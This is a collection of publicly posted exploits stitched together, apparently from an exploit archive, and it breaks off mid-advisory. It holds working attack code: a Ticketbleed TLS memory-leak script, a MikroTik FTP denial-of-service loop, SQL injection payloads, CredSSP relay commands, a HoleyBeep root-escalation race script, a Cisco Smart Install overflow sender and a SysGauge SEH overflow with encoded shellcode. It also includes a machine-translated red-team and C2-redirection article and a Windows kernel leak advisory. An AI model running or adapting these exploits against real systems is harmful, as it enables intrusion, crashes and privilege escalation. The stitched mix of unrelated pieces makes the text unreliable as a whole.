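    input: a str (Python 2 bytes or 3 text) or a bytes object.
    ASCII column: NUL is shown as '0', printable ASCII (0x20-0x7e) as itself,
    anything else as '.'. Returns "" for empty input.

    Fixes in this version: the NUL test compared a one-character string with
    '0x0' (never true), the printable range started at 30 instead of 0x20 and
    included 0x7f/0x80, and full 16-byte rows were not padded to the same
    column as the last row, so the ASCII column did not line up.
    """
    hex_col, ascii_col = [], []
    for e in input:
        # bytes iterate as ints on Python 3, as 1-char strings on Python 2.
        code = e if isinstance(e, int) else ord(e)
        hex_col.append('%02x' % code)
        if code == 0:
            ascii_col.append('0')
        elif 32 <= code <= 126:
            ascii_col.append(chr(code))
        else:
            ascii_col.append('.')
    out = ''
    for i in range(0, len(hex_col), 16):
        hex_part = ' '.join(hex_col[i:i + 16])
        out += hex_part + ' ' * (56 - len(hex_part)) + ' '.join(ascii_col[i:i + 16]) + "\n"
    return out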
def ticketBleed (rhost, rport):
    """Demonstrate CVE-2016-9244 against rhost:rport and print the leaked bytes.

    Connection 1 completes a TLS 1.2 handshake that advertises an empty
    SessionTicket extension and keeps the ticket and master secret the
    server returns. Connection 2 resumes with that ticket and a one-byte
    session_id ("A"); an affected server answers with a 32-byte
    ServerHello.session_id, so the 31 bytes after "A" come from server
    memory and are hex-dumped. Mitigation is the vendor fix referenced in
    the header (F5 K05121675).
    """
    h = (rhost,int(rport));
    version = TLSVersion.TLS_1_2
    secret = ""
    session_ticket = ""
    sid = ""
    cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
    # --- connection 1: full handshake, collect ticket + master secret ---
    with TLSSocket(socket.socket(), client=True) as sock:
        sock.connect(h)
        ctx = sock.tls_ctx
        packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
        sock.sendall(packet)
        sock.recvall()
        packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
        packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
        sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
        sock.sendall(to_raw(TLSFinished(), ctx))
        ret = sock.recvall()
        session_ticket = ret[TLSSessionTicket].ticket
        secret = ctx.master_secret
        #pretty("*", "ctx 1: \n" + str(ctx))
    # --- connection 2: resume with the ticket and a 1-byte session_id ---
    with TLSSocket(socket.socket(), client=True) as sock:
        sock.connect(h)
        ctx = sock.tls_ctx
        packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
        sock.tls_ctx.resume_session(secret)
        sock.sendall(packet)
        ret = sock.recvall()
        sid = ret[TLSServerHello].session_id
        #pretty("*", "ctx 2: \n" + str(ctx))
        pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))
def main():
    """Parse -a/--rhost and -b/--rport, show the banner, run ticketBleed, exit 0.

    -h/--help prints the usage text (and exits); so does a missing host or port.
    Note the getopt spec declares 'h:' (option with argument), as in the original.
    """
    target = {"rhost": None, "rport": None}
    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=', 'rport=', 'help'])
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a', '--rhost'):
            target["rhost"] = arg
        elif opt in ('-b', '--rport'):
            target["rport"] = arg
    banner()
    if target["rhost"] is None or target["rport"] is None:
        usage()
    ticketBleed(target["rhost"], target["rport"])
    exit(0)
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()
################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All versions
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begin with many '\0' characters, preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################
# Start 100 background connections, two seconds apart, each feeding the
# contents of the file "craft" to the router's FTP port.
for i in $(seq 1 100); do
  cat craft | nc -nv <MikroTik IP> 21 &
  sleep 2
done
# Exploit Title: Cobub Razor 0.8.0 SQL injection Vulnerability
# Date: 2018-04-16
# Exploit Author: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
# Vendor Homepage: http://www.cobub.com/
# Software Link: https://github.com/cobub/razor
# Version: 0.8.0
# CVE : CVE-2018-8057
The 'channel_name' and 'platform' parameters are passed without any check or filtering, so a crafted string leads to a SQL injection vulnerability. This could result in full information disclosure.
Code source:
/application/controllers/manage/channel.php at line 75-95
The SQL injection type: error-based and AND/OR time-based blind
Parameter: channel_name,platform
PoC:
http://localhost/index.php?/manage/channel/addchannel
POST data:
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1
# credssp
This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay.
Written by Eyal Karni, Preempt
ekarni@preempt.com
# Build
## Instructions (Linux)
If you are using Ubuntu 14, check the install file.
It was tested on Ubuntu 16.04.
```
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
```
EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44453.zip
* It assumes a fairly clean initial state. It is best to first uninstall relevant components such as cryptography and possibly pyopenssl (pip uninstall cryptography).
* A different version of openssl needs to be installed for this to run successfully; the install script does that.
* Please follow the instructions in the described order.
# Running the exploit
Export a certificate suitable for Server Authentication from any domain.
To generate a suitable certificate for the command to execute :
```
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
```
(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
To run the attack script:
```
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
```
More details are in the usage section of the scripts (--help).
#!/usr/bin/env python3
#
# E-DB Note ~ https://gist.github.com/Arignir/0b9d45c56551af39969368396e27abe8/ec853f14afd6e86fb3f2efce2086e28f33039ddc
# E-DB Note ~ https://sigint.sh/#/holeybeep
#
# This is an exploit for HoleyBeep.
#
# To use it, place any command you want root to execute in `/tmp/x`.
# ```
# $ cat /tmp/x
# echo PWNED $(whoami)
# ```
# The exploit takes a path to write to (the file must already exist) and rewrites its first bytes to /*/x. This means that if it's a shell script, it will execute /tmp/x as its first and only command.
#
# To gain root access, the idea is to use the exploit to overwrite any file in /etc/profile.d/ so it will execute /*/x on the next login, possibly as the root user.
#
# Variants are possible using cron instead of the shell, so you don't have to wait until root logs in.
#
import argparse
import shutil
import os
import subprocess
import time
import signal
import ntpath
# Relative path of the symlink handed to beep's --device (created in the
# current working directory and re-pointed during each attempt).
TMP_PATH="beep_exploit"
def backup_output(path):
    """If path is a regular file, copy it to '<basename>.bak' in the current
    directory and report where the copy went. Does nothing otherwise."""
    if not os.path.isfile(path):
        return
    dest = ntpath.basename("{}.bak".format(path))
    shutil.copy(path, dest)
    print("Backup made at '{}'".format(dest))
def main() -> None:
    """Race beep(1) between two symlink targets until the output file starts with b'/*/x'.

    Command line: OUTPUT (an existing file to overwrite), --path (beep binary,
    default /usr/bin/beep), --time-low/--time-high (delay window in
    microseconds; the loop sweeps it one microsecond at a time and wraps),
    --no-backup (skip the .bak copy made by backup_output()).

    Each iteration starts beep with --device pointing at the symlink TMP_PATH,
    sleeps half the current delay, re-points the symlink at the output file,
    sleeps the other half and then interrupts the process.  The loop ends
    only on success; there is no attempt limit.
    """
    parser = argparse.ArgumentParser(description='Holey beep exploit script.')
    parser.add_argument('output', metavar='OUTPUT', help='the output file to corrupt')
    parser.add_argument('--path', default="/usr/bin/beep", help='path to beep')
    parser.add_argument('--time-low', default=6000, type=int, help='time to wait (micro-seconds), lower bound')
    parser.add_argument('--time-high', default=6900, type=int, help='time to wait (micro-seconds), higher bound')
    parser.add_argument('--no-backup', action='store_true', help='doesn\'t backup the output file')
    args = parser.parse_args()
    if not args.no_backup:
        backup_output(args.output)
    # NOTE(review): opened read-only (default mode) and never closed; it is only
    # handed to Popen as stderr so the child's diagnostics are discarded.
    devnull = open("/dev/null")
    timer = args.time_low
    while True:
        # Create original symlink
        try:
            os.remove(TMP_PATH)
        except OSError:
            pass
        os.symlink("/dev/input/event0", TMP_PATH)
        # Open subprocess.  2016356911 == 0x782F2A2F, whose little-endian byte
        # order is b'/*/x' -- the marker the check at the bottom of the loop
        # looks for.
        p = subprocess.Popen([args.path, "--device", TMP_PATH, "-l", "1", "-n", "-l", "2016356911"], stderr=devnull)
        time.sleep(timer/2 / 1000000.0)  # timer is in microseconds
        # Replace symlink
        try:
            os.remove(TMP_PATH)
        except OSError:
            pass
        os.symlink(args.output, TMP_PATH)
        time.sleep(timer/2 / 1000000.0)
        # Trigger SIGINT
        os.kill(p.pid, signal.SIGINT)
        # Kill process if it's still alive (200 us later).  The child is never
        # waited for, so its pid presumably stays valid (zombie) until exit.
        time.sleep(200.0 / 1000000.0)
        os.kill(p.pid, signal.SIGKILL)
        # Verify result: success means the first four bytes of the output file
        # are now the marker.
        with open(args.output, 'rb') as f:
            data = f.read(4)
        if data == b'/*/x':
            print("Done!")
            break
        # Sweep the delay window; wrap around at the upper bound.
        timer += 1
        if timer > args.time_high:
            timer = args.time_low
# Script entry point; argument parsing and the whole loop live in main().
if __name__ == '__main__':
    main()
# smi_ibc_init_discovery_BoF.py
import socket
import struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
    """Build a type-length-value record.

    The type ``t`` is packed with ``t_fmt`` and the length of ``v`` with
    ``l_fmt`` (both big-endian 32-bit by default); ``v`` follows unchanged.
    """
    header = struct.pack(t_fmt, t)
    header += struct.pack(l_fmt, len(v))
    return header + v
def send_packet(sock, packet):
    """Hand ``packet`` to ``sock.send`` in a single call.

    The number of bytes actually sent is not checked or returned; a short
    send is silently ignored, exactly as in the original helper.
    """
    sock.send(packet)
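def receive(sock, bufsize=4096):
    """Read up to ``bufsize`` bytes from ``sock`` and return them.

    ``socket.recv`` requires a buffer size; the original call omitted it and
    would have raised ``TypeError`` on a real socket.  The default keeps the
    one-argument call shape used elsewhere working.
    """
    return sock.recv(bufsize)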
if __name__ == "__main__":
    # Python 2 script: print statements and str-typed byte strings throughout.
    print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
    # NOTE(review): the socket is never closed and nothing is read back.
    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    con.connect((options.target, options.port))
    # Two filler blobs: 176 bytes of 'B' and 2048 bytes of 'D'.
    payload = 'BBBB' * 44
    shellcode = 'D' * 2048
    # 36 bytes of 'A', a big-endian length covering payload + shellcode + 40,
    # then the payload itself.
    data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
    # data is wrapped as TLV type 1; the 'D' block is appended raw, without a
    # TLV header of its own.
    tlv_1 = craft_tlv(0x00000001, data)
    tlv_2 = shellcode
    # 16-byte message header: four big-endian 32-bit fields.
    hdr = '\x00\x00\x00\x01' # msg_from
    hdr += '\x00\x00\x00\x01' # version
    hdr += '\x00\x00\x00\x07' # msg_hdr_type
    hdr += struct.pack('>I', len(data)) # data_length -- counts only `data`, not the TLV header or tlv_2
    pkt = hdr + tlv_1 + tlv_2
    print "[*] Send a malicious packet"
    send_packet(con, pkt)
0x00。レッドチームの建設目標は、ニュース放送と軍事ソリューションを聴くことです。軍事解決中に、赤と青の軍隊の間の対立を聞きます。情報セキュリティ業界では、軍隊との類似点があります。インターネットワールドレッドチームは攻撃者の側です。セキュリティ能力の改善は、セキュリティの脅威が発見される前に、犯罪、防御、対立の形にのみ反映されます。
Red Teamは、さまざまなレベルの安全性でのさまざまなシステムの浸透テストと安全手順に焦点を当てています。脆弱性を検出、防止、排除できます。 Red Teamは、会社または組織を攻撃する可能性のある実生活の攻撃を模倣し、攻撃者が使用する必要なすべての手順を実行します。攻撃者の役割を引き受けることにより、彼らは、サイバーセキュリティに脅威を与えるバックドアや搾取可能な脆弱性である可能性のある組織を示しています。
一般的な慣行は、レッドチームワークのために組織外の人々を雇うことです。誰かがセキュリティの脆弱性を活用するという知識を習得していますが、組織のインフラストラクチャに組み込まれた防御に気づいていません。
もちろん、エンタープライズセキュリティの建設の過程で、当社の企業は、基本的な防御と検出機能があり、この機能を継続的に検査および改善する必要がある場合にのみ、赤チームを構築する必要があります。
0x01。レッドチームのスキル1。レッドチームの主な特徴は、箱の外側を考えることです。会社の安全をよりよく保護するための新しいツールとテクノロジーを常に探しています。赤いチームであることは、タブーであるため、ある程度の反乱を抱えています。ルールと正当性を破りながら白い帽子のテクニックに従い、システムの欠陥を人々に示します。誰もがこれらを好むわけではありません。
2。攻撃されたシステムの詳細な理解は、Redチームがすべてのシステムを理解し、技術的な傾向に従うことが重要です。サーバーとデータベースを理解することで、脆弱性を見つける方法を見つけるためのより多くのオプションが得られます。
3.セキュリティツールの自動化機能独自のツールを開発する方法を理解することの利点は膨大です。ソフトウェアを書くには多くの練習と絶え間ない学習が必要であるため、それを使用して得られるスキルは、どんなレッドチームでも最高の攻撃戦術を実行するのに役立ちます。
4.浸透テスト浸透テストは、コンピューターとネットワークシステムに対する攻撃をシミュレートし、セキュリティの評価に役立ちます。脆弱性と包括的なリスク評価を提供する潜在的な脅威を特定します。浸透テストは、Redチームの重要な部分であり、その「標準」手順の一部です。また、白い帽子でもよく使用されます。
5.ソーシャルエンジニアリングあらゆる組織のセキュリティ監査を実行する場合、ヒューマンエラーはデータ侵害とリークの最も一般的な原因の1つであるため、機密データ侵害につながる可能性のある運用を実行するために人員を操作することが重要です。
0x02。レッドチームは、相手を攻撃する前にインフラストラクチャに侵入し、独自のインフラストラクチャを構築する必要があります。全体として、最初の部分、インテリジェンスコレクション、2番目の部分、C2アーキテクチャの2つの部分があります。
1.アクティブインテリジェンスコレクション:ターゲットドメイン名を収集し、ホストをスキャンし、Webシステムの脆弱性を収集し、
パッシブコレクション:Shodan、Google、Github、Maltego、その他のインテリジェンスを使用して収集します。
ソーシャルワーカーの収集:コーポレートメール、WeChat、Weiboなどの企業従業員に関する情報。
2。C2アーキテクチャの簡単な説明:C2は、ターゲットシステムの権限を取得した後、バックドアがシステムを持続することを意味します。施設のこの部分は、ペイロード生成システムと協力する必要があります。
現在の一般的な方法:DNSトンネルとHTTPトンネルによってアウトリーチされたC2システム。
C2トラフィックのリダイレクトの背後にある目的は2つのものです。緊急対応者が通信イベントを表示する場合、バックエンドチームサーバーを混乱させると、正当なWebサイトのようです。 Apache Mod_rewriteとカスタムC2構成ファイルを使用することにより、調査トラフィックからの実際のC2トラフィックを確実にフィルタリングできます。
上記の「C2リダイレクト」に基づいてC2リダイレクトにHTTPSを使用して、別の方法は、リダイレクトサーバーにApacheのSSLプロキシエンジンを使用してインバウンドSSL要求を受け入れ、それらのリクエストをリバースHTTPSリスナーにプロキシにすることです。暗号化はすべてのフェーズで使用され、必要に応じてリダイレクターでSSL証明書を回転させることができます。
0x03。 REDチームの価値は、定量的侵入指標を通じてセキュリティ機能を改善し、セキュリティ製品チームがホストおよびネットワークベースの侵入検知システムの検出率を改善するのにも役立ちます。
from:https://www.4hou.com/penetration/17530.html
#!/usr/bin/python
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sysgauge.com/ #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe #
# Tested on : Windows XP Professional - SP3 #
# Steps to reproduce : ~ Copy content of payload.txt #
# ~ Under Register type in "falafel" in Customer Name field #
# ~ Paste the content of payload.txt in Unlock Key field and click Register #
##################################################################################################################
import struct
# ***notes***
# ~ this particular function [Register] of the program only accepts characters [00-7f] excluding "\x00\x09\x0a\x0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address
# ~ the following are Flexense products affected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
# ~ SysGauge Ultimate v4.6.12
# ~ Azure DEX Pro v2.2.16
# ~ Azure DEX Ultimate v2.2.16
# ~ DiskBoss Pro v9.1.16
# ~ DiskBoss Ultimate v9.1.16
# ~ SyncBreeze Pro v10.7.14
# ~ SyncBreeze Ultimate v10.7.14
# ~ DiskPulse Pro v10.7.14
# ~ DiskPulse Ultimate v10.7.14
# ~ DiskSavvy Pro v10.7.14
# ~ DiskSavvy Ultimate v10.7.14
# ~ DiskSorter Pro v10.7.14
# ~ DiskSorter Ultimate v10.7.14
# ~ DupScout Pro v10.7.14
# ~ DupScout Ultimate v10.7.14
# ~ VX Search Pro v10.7.14
# ~ VX Search Ultimate v10.7.14
##################################################################################################################
# overwrite SEH with clean address of [pop, pop, ret]
# Payload layout as assembled below.  The segment lengths are exactly the terms
# subtracted in the final padding expression (they sum to 1016), so the file
# written at the end is 50000 bytes long:
#   780   filler up to nSEH
#     4   nSEH
#     4   SEH (pop/pop/ret address in libdgg.dll)
#    28   filler
#   21,26,22,21,21,21,21   seven encoded "push" groups (and/and/add/add[/dec]/push)
#    25   one encoded group followed by five pushes (nop padding)
#    21   encoded "jmp esp" address group
#     1   0xff trailer
#   rest  'C' filler
# Every byte stays inside 00-7f (and avoids 00/09/0a/0d, see the notes at the
# top), which is why each 32-bit value is assembled with "and" masks and two
# or three "add eax" steps whose immediates all fall inside that range.
buffer = "\x41" * 780 # junk to nSEH
buffer += "\x74\x06\x42\x42" # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16) # SEH (pop esi # pop ecx # retn | [libdgg.dll])
buffer += "\x43" * 28 # some more junk
# push calc.exe instructions [encoded] into the stack
# Disassembly:
# 0: 33 c0 xor eax,eax # zero out eax register
# 2: 50 push eax # push eax (null-byte) to terminate "calc.exe"
# 3: 68 2E 65 78 65 push ".exe" # push the ASCII string to the stack
# 8: 68 63 61 6C 63 push "calc" #
# d: 8b c4 mov eax,esp # put the pointer to the ASCII string in eax
# f: 6a 01 push 0x1 # push uCmdShow parameter to the stack
# 11: 50 push eax # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c mov ebx,0x7c862b5d # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3 call ebx # call WinExec()
# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "\x33\xc0\x50\x68"
# "\x2e\x65\x78\x65"
# "\x68\x63\x61\x6C"
# "\x63\x8b\xc4\x6a"
# "\x01\x50\xbb\x5d"
# "\x2b\x86\x7c\xff"
# "\xd3\x90\x90\x90"
# starting from the bottom up in little endian order
# first push "\x90\x90\x90\xd3"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\xd3" into eax and push it to the stack
buffer += "\x05\x72\x70\x70\x70" ### add eax,0x70707072
buffer += "\x05\x61\x20\x20\x20" ### add eax,0x20202061
buffer += "\x50" ### push eax
##############################################################
# second push "\xff\x7c\x86\x2b"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\xff\x7c\x86\x2b" into eax and push it to the stack
buffer += "\x05\x01\x32\x35\x66" ### add eax,0x66353201
buffer += "\x05\x15\x32\x35\x66" ### add eax,0x66353215
buffer += "\x05\x15\x22\x12\x33" ### add eax,0x33122215
buffer += "\x50" ### push eax
##############################################################
# third push "\x5d\xbb\x50\x01"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x5d\xbb\x50\x01" into eax and push it to the stack
buffer += "\x05\x01\x30\x65\x36" ### add eax,0x36653001
buffer += "\x05\x01\x20\x56\x27" ### add eax,0x27562001
buffer += "\x48" ### dec eax
buffer += "\x50" ### push eax
##############################################################
# fourth push "\x6a\xc4\x8b\x63"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6a\xc4\x8b\x63" into eax and push it to the stack
buffer += "\x05\x32\x46\x70\x35" ### add eax,0x35544632
buffer += "\x05\x31\x43\x70\x35" ### add eax,0x35704531
buffer += "\x50" ### push eax
##############################################################
# fifth push "\x6c\x61\x63\x68"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6c\x61\x63\x68" into eax and push it to the stack
buffer += "\x05\x34\x32\x31\x36" ### add eax,0x36313234
buffer += "\x05\x34\x31\x30\x36" ### add eax,0x36303134
buffer += "\x50" ### push eax
##############################################################
# sixth push "\x65\x78\x65\x2e"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x65\x78\x65\x2e" into eax and push it to the stack
buffer += "\x05\x17\x33\x34\x33" ### add eax,0x33343317
buffer += "\x05\x17\x32\x44\x32" ### add eax,0x32443217
buffer += "\x50" ### push eax
##############################################################
# seventh push "\x68\x50\xc0\x33"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x68\x50\xc0\x33" into eax and push it to the stack
buffer += "\x05\x22\x60\x30\x34" ### add eax,0x34306022
buffer += "\x05\x11\x60\x20\x34" ### add eax,0x34206011
buffer += "\x50" ### push eax
##############################################################
# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\x90" into eax and push it to the stack
buffer += "\x05\x70\x70\x70\x70" ### add eax,0x70707070
buffer += "\x05\x20\x20\x20\x20" ### add eax,0x20202020
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
##############################################################
# push "jmp esp" address [encoded] to the stack
# 0x6709e053 : "\xff\xe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\Program Files\SysGauge Pro\bin\QtCore4.dll)
# 0: 25 10 10 10 10 and eax,0x10101010
# 5: 25 01 01 01 01 and eax,0x1010101
# a: 05 31 70 03 34 add eax,0x34037031
# f: 05 22 70 06 33 add eax,0x33067022
# 14: 50 push eax
buffer += "\x25\x10\x10\x10\x10\x25\x01\x01\x01\x01\x05\x31\x70\x03\x34\x05\x22\x70\x06\x33\x50"
# the program converts "\xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "\xff"
# Pad to a fixed total: each subtracted term is the length of one segment
# appended above (in order), 1016 bytes in all, so len(buffer) == 50000.
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1) ### junk
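# Write the assembled buffer to payload.txt in the working directory.
# The file is opened in text mode as before; the notes at the top state that
# the buffer contains no CR/LF bytes, so no newline translation can occur.
# A `with` block guarantees the handle is closed even if write() fails, and
# only I/O errors are reported as "cannot be created" -- the original bare
# `except:` also hid KeyboardInterrupt and programming errors.
try:
    with open("payload.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except (IOError, OSError):
    print("File cannot be created")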
/*
We have discovered that the nt!NtQueryFullAttributesFile system call invoked with paths of certain kernel objects discloses uninitialized kernel stack memory to user-mode clients. The vulnerability affects Windows 7 to 10, 32/64-bit. The paths that we have observed to trigger the leak in our test Windows 10 (1709) 64-bit VM are:
--- cut ---
"\GLOBAL??\D:\" (CD-ROM partition)
"\GLOBAL??\CdRom0\"
"\GLOBAL??\FltMgr"
"\GLOBAL??\FltMgr\"
"\GLOBAL??\MAILSLOT\"
"\GLOBAL??\Volume{GUID}\"
"\GLOBAL??\PIPE\"
"\Device\CdRom0\"
"\Device\NamedPipe\"
"\Device\Mailslot\"
--- cut ---
The output structure returned by the system call is FILE_NETWORK_OPEN_INFORMATION [1]:
--- cut ---
typedef struct _FILE_NETWORK_OPEN_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER AllocationSize;
LARGE_INTEGER EndOfFile;
ULONG FileAttributes;
} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
--- cut ---
It occupies 52 (0x34) bytes in memory, but due to alignment to an 8-byte boundary, it is effectively 56 (0x38) bytes long. In case of most of the above affected paths, the problem is that the 4 trailing bytes of padding are never initialized. As the kernel uses a temporary copy of the structure (allocated in the stack frame of nt!NtQueryFullAttributesFile) that is later passed to user-mode, the bug results in the disclosure of those 4 uninitialized kernel stack bytes. This can be observed by running the attached proof-of-concept program, which invokes nt!NtQueryFullAttributesFile against every object in the global object namespace, preceded by spraying the kernel stack with a 0x41 ('A') marker byte. Relevant parts of the output are shown below:
--- cut ---
Name: \GLOBAL??\D:\, Status: 0
00000000: 80 08 4a 06 66 46 d3 01 00 00 00 00 00 00 00 00 ..J.fF..........
00000010: 80 08 4a 06 66 46 d3 01 80 08 4a 06 66 46 d3 01 ..J.fF....J.fF..
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \GLOBAL??\CdRom0\, Status: 0
00000000: 80 08 4a 06 66 46 d3 01 00 00 00 00 00 00 00 00 ..J.fF..........
00000010: 80 08 4a 06 66 46 d3 01 80 08 4a 06 66 46 d3 01 ..J.fF....J.fF..
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \GLOBAL??\MAILSLOT\, Status: 0
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \GLOBAL??\Volume{GUID}\, Status: 0
00000000: 80 08 4a 06 66 46 d3 01 00 00 00 00 00 00 00 00 ..J.fF..........
00000010: 80 08 4a 06 66 46 d3 01 80 08 4a 06 66 46 d3 01 ..J.fF....J.fF..
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \GLOBAL??\PIPE\, Status: 0
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \Device\CdRom0\, Status: 0
00000000: 80 08 4a 06 66 46 d3 01 00 00 00 00 00 00 00 00 ..J.fF..........
00000010: 80 08 4a 06 66 46 d3 01 80 08 4a 06 66 46 d3 01 ..J.fF....J.fF..
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \Device\NamedPipe\, Status: 0
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
Name: \Device\Mailslot\, Status: 0
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 10 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
